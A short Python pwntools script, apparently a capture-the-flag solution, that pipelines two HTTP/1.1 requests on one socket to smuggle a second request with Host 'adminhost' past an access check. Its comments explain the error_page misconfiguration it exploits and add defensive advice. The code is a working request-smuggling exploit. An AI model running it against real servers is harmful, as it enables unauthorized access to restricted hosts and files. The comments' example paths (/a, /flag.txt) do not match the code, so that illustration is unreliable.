# Sends two HTTP/1.1 requests back-to-back on one TCP connection to
# localhost:80, then attaches the terminal to the socket so the responses
# can be read.

import pwn

# Only surface pwntools log messages at error level.
pwn.context.log_level = 'error'

remote = pwn.remote('localhost', 80)

# One sendline() call per entry, in order. The empty string terminates each
# header block. The first request names Host "localhost", the second names
# Host "adminhost".
# NOTE(review): sendline() appends pwntools' default line ending (LF unless
# reconfigured), so these lines are presumably not CRLF-terminated; confirm.
for request_line in (
    'GET / HTTP/1.1',
    'Host: localhost',
    '',
    'GET / HTTP/1.1',
    'Host: adminhost',
    '',
):
    remote.sendline(request_line)

# Hand the connection over to the terminal to view whatever comes back.
remote.interactive()

# The request stream looks like this:
#   GET /a HTTP/1.1
#   Host: localhost
#
#   GET /flag.txt HTTP/1.1
#   Host: adminhost
# where the second request is the one being smuggled.
# NOTE(review): the illustration uses /a and /flag.txt, but the code above
# requests "/" both times; confirm which paths are intended.
#
# This only works because the server uses an http://url target in its
# error_page directive.
# Defensive takeaway: audit error_page directives that point at an absolute
# http:// URL (a local URI or a named location avoids that form), and review
# logs for a single connection carrying requests with different Host headers.
# Presumably the access decision is made on the first request only; verify
# against the actual deployment.